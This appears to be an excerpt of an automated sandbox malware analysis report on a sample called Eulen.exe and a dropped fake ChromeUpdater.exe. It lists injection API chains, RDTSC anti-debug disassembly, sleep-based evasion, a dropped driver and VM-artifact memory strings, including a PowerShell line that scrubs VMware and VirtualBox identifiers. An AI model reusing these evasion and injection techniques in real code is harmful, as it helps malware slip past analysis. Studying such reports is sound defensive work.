          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\choice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\choice.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00007FF6473410C0
          Source: C:\Users\user\Desktop\Eulen.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeSystem information queried: FirmwareTableInformation
          Source: Eulen.exe, 00000000.00000002.1640284645.000001C89A217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLE
          Source: C:\Users\user\Desktop\Eulen.exeRDTSC instruction interceptor: First address: 7FF6E4DD722E second address: 7FF6E4DD722E instructions: 0x00000000 rdtsc 0x00000002 dec edx 0x00000003 lea edx, dword ptr [edi+ebx] 0x00000006 dec eax 0x00000007 lea eax, dword ptr [edx+04h] 0x0000000a inc ecx 0x0000000b test ah, ah 0x0000000d dec eax 0x0000000e cmp eax, ebx 0x00000010 jmp 00007FAB24D24A55h 0x00000015 jnc 00007FAB24D24A9Ch 0x0000001b inc ecx 0x0000001c mov eax, dword ptr [ebx] 0x0000001e inc ecx 0x0000001f xor eax, eax 0x00000021 test ax, 00004335h 0x00000025 inc ecx 0x00000026 cmp eax, dword ptr [ecx+1Ch] 0x00000029 jmp 00007FAB24D24A55h 0x0000002e jne 00007FAB24D24A83h 0x00000034 dec eax 0x00000035 cmp edx, ebx 0x00000037 jmp 00007FAB24D24A55h 0x0000003c jnc 00007FAB24D24A86h 0x00000042 inc ecx 0x00000043 mov eax, dword ptr [ebx] 0x00000045 inc ecx 0x00000046 test bl, FFFFFF94h 0x00000049 inc ecx 0x0000004a xor eax, eax 0x0000004c inc ecx 0x0000004d cmp ch, 0000000Ah 0x00000050 inc ecx 0x00000051 cmp eax, dword ptr [ecx+28h] 0x00000054 jmp 00007FAB24D24A55h 0x00000059 jne 00007FAB24D24A69h 0x0000005f dec eax 0x00000060 lea eax, dword ptr [edx+03h] 0x00000063 dec eax 0x00000064 cmp eax, ebx 0x00000066 jmp 00007FAB24D24A55h 0x0000006b jnc 00007FAB24D24AB3h 0x00000071 inc ecx 0x00000072 mov eax, dword ptr [ebx] 0x00000074 inc ecx 0x00000075 xor eax, eax 0x00000077 inc ecx 0x00000078 cmp eax, dword ptr [ecx+30h] 0x0000007b jmp 00007FAB24D24A55h 0x00000080 jne 00007FAB24D24A9Eh 0x00000086 dec ecx 0x00000087 inc edx 0x00000089 jmp 00007FAB24D24A56h 0x0000008e dec esp 0x0000008f cmp edx, ebx 0x00000091 jmp 00007FAB24D24A55h 0x00000096 jc 00007FAB24D24928h 0x0000009c dec ebp 0x0000009d lea ebx, dword ptr [edx+ecx] 0x000000a0 and dx, 7F3Ch 0x000000a5 rdtsc
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeRDTSC instruction interceptor: First address: 7FF60D4A722E second address: 7FF60D4A722E instructions: 0x00000000 rdtsc 0x00000002 dec edx 0x00000003 lea edx, dword ptr [edi+ebx] 0x00000006 dec eax 0x00000007 lea eax, dword ptr [edx+04h] 0x0000000a inc ecx 0x0000000b test ah, ah 0x0000000d dec eax 0x0000000e cmp eax, ebx 0x00000010 jmp 00007FAB250F62D5h 0x00000015 jnc 00007FAB250F631Ch 0x0000001b inc ecx 0x0000001c mov eax, dword ptr [ebx] 0x0000001e inc ecx 0x0000001f xor eax, eax 0x00000021 test ax, 00004335h 0x00000025 inc ecx 0x00000026 cmp eax, dword ptr [ecx+1Ch] 0x00000029 jmp 00007FAB250F62D5h 0x0000002e jne 00007FAB250F6303h 0x00000034 dec eax 0x00000035 cmp edx, ebx 0x00000037 jmp 00007FAB250F62D5h 0x0000003c jnc 00007FAB250F6306h 0x00000042 inc ecx 0x00000043 mov eax, dword ptr [ebx] 0x00000045 inc ecx 0x00000046 test bl, FFFFFF94h 0x00000049 inc ecx 0x0000004a xor eax, eax 0x0000004c inc ecx 0x0000004d cmp ch, 0000000Ah 0x00000050 inc ecx 0x00000051 cmp eax, dword ptr [ecx+28h] 0x00000054 jmp 00007FAB250F62D5h 0x00000059 jne 00007FAB250F62E9h 0x0000005f dec eax 0x00000060 lea eax, dword ptr [edx+03h] 0x00000063 dec eax 0x00000064 cmp eax, ebx 0x00000066 jmp 00007FAB250F62D5h 0x0000006b jnc 00007FAB250F6333h 0x00000071 inc ecx 0x00000072 mov eax, dword ptr [ebx] 0x00000074 inc ecx 0x00000075 xor eax, eax 0x00000077 inc ecx 0x00000078 cmp eax, dword ptr [ecx+30h] 0x0000007b jmp 00007FAB250F62D5h 0x00000080 jne 00007FAB250F631Eh 0x00000086 dec ecx 0x00000087 inc edx 0x00000089 jmp 00007FAB250F62D6h 0x0000008e dec esp 0x0000008f cmp edx, ebx 0x00000091 jmp 00007FAB250F62D5h 0x00000096 jc 00007FAB250F61A8h 0x0000009c dec ebp 0x0000009d lea ebx, dword ptr [edx+ecx] 0x000000a0 and dx, 7F3Ch 0x000000a5 rdtsc
          Source: C:\Users\user\Desktop\Eulen.exeSpecial instruction interceptor: First address: 7FF6E4DD7866 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeSpecial instruction interceptor: First address: 7FF60D4A7866 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5583Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4192Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7869Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1655Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4634Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5365Jump to behavior
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9964Jump to behavior
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9857
          Source: C:\Users\user\Desktop\Eulen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeDropped PE file which has not been started: C:\Windows\Temp\auqpbnqlvfdv.tmpJump to dropped file
          Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_22-14677
          Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_24-21345
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_23-14138
          Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_19-24617
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-449
          Source: C:\Windows\System32\lsass.exeAPI coverage: 7.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.5 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 3.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 3.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 2.9 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.3 %
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeAPI coverage: 1.3 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 3.3 %
          Source: C:\Users\user\Desktop\Eulen.exe TID: 7592Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 5583 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 4192 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\System32\dialer.exe TID: 8084Thread sleep count: 152 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep count: 7869 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 1655 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 7384Thread sleep count: 4634 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 7384Thread sleep time: -4634000s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 7384Thread sleep count: 5365 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 7384Thread sleep time: -5365000s >= -30000sJump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 752Thread sleep count: 9964 > 30Jump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 752Thread sleep time: -9964000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 964Thread sleep count: 244 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 964Thread sleep time: -244000s >= -30000sJump to behavior
          Source: C:\Windows\System32\dwm.exe TID: 1796Thread sleep count: 9857 > 30
          Source: C:\Windows\System32\dwm.exe TID: 1796Thread sleep time: -9857000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6840Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6840Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6972Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6972Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6832Thread sleep count: 251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6832Thread sleep time: -251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6780Thread sleep count: 206 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6780Thread sleep time: -206000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6364Thread sleep count: 251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6364Thread sleep time: -251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep count: 247 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep time: -247000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2384Thread sleep count: 231 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2384Thread sleep time: -231000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4064Thread sleep count: 246 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4064Thread sleep time: -246000s >= -30000s
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe TID: 5080Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6592Thread sleep count: 239 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6592Thread sleep time: -239000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5124Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5124Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4832Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4832Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6652Thread sleep count: 249 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6652Thread sleep time: -249000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3872Thread sleep count: 251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3872Thread sleep time: -251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5432Thread sleep count: 247 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5432Thread sleep time: -247000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6880Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6880Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5712Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5712Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2840Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2840Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2168Thread sleep count: 248 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2168Thread sleep time: -248000s >= -30000s
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99175BE3C FindFirstFileExW,19_2_000002E99175BE3C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCEBE3C FindFirstFileExW,22_2_00000213BDCEBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709DBE3C FindFirstFileExW,23_2_00000158709DBE3C
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15CBE3C FindFirstFileExW,24_2_0000026DB15CBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F066BE3C FindFirstFileExW,26_2_000002A3F066BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBBBE3C FindFirstFileExW,27_2_000002C9AFBBBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B029BE3C FindFirstFileExW,27_2_000002C9B029BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD4BE3C FindFirstFileExW,28_2_000002C06FD4BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3BBE3C FindFirstFileExW,29_2_000002917C3BBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C97BE3C FindFirstFileExW,29_2_000002917C97BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002238279BE3C FindFirstFileExW,30_2_000002238279BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B88BE3C FindFirstFileExW,31_2_0000028A1B88BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD7BE3C FindFirstFileExW,32_2_000001486AD7BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADDBE3C FindFirstFileExW,32_2_000001486ADDBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CDBE3C FindFirstFileExW,33_2_0000024BD3CDBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D3BE3C FindFirstFileExW,33_2_0000024BD3D3BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D6BE3C FindFirstFileExW,34_2_000001FA73D6BE3C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42FBE3C FindFirstFileExW,39_2_00000249E42FBE3C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E432BE3C FindFirstFileExW,39_2_00000249E432BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0240BE3C FindFirstFileExW,41_2_000001CD0240BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA66BE3C FindFirstFileExW,42_2_00000269BA66BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6CBE3C FindFirstFileExW,42_2_00000269BA6CBE3C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: svchost.exe, 00000021.00000003.1681695409.0000024BD5B03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c29198182f16b7176b0e680deba6PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: svchost.exe, 00000021.00000002.2690358775.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.1621867069.0000024BD362B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: lsass.exe, 00000016.00000000.1538314202.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c29198182f16b7176b0e680deba6
          Source: svchost.exe, 00000021.00000002.2690830623.0000024BD3643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: svchost.exe, 0000001E.00000002.2686557337.000002238202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
          Source: svchost.exe, 00000021.00000003.1675230564.0000024BD5212000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: svchost.exe, 00000021.00000003.1681695409.0000024BD5B03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: svchost.exe, 00000021.00000002.2688992019.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c29198182f16b7176b0e680deba6PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
          Source: Eulen.exe, 00000000.00000002.1654102663.00007FF6DFA7D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: fLZVmcIN^
          Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
          Source: svchost.exe, 00000021.00000002.2723449932.0000024BD5BD1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 9-4vmci
          Source: lsass.exe, 00000016.00000002.2686343397.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538141905.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2681555387.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1550913027.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1590898977.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2682751227.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.1595565692.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2677459393.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.2687175881.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.1600016674.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.2690358775.0000024BD362B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000021.00000002.2688992019.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba6
          Source: dwm.exe, 00000018.00000000.1556176246.0000026DACB82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
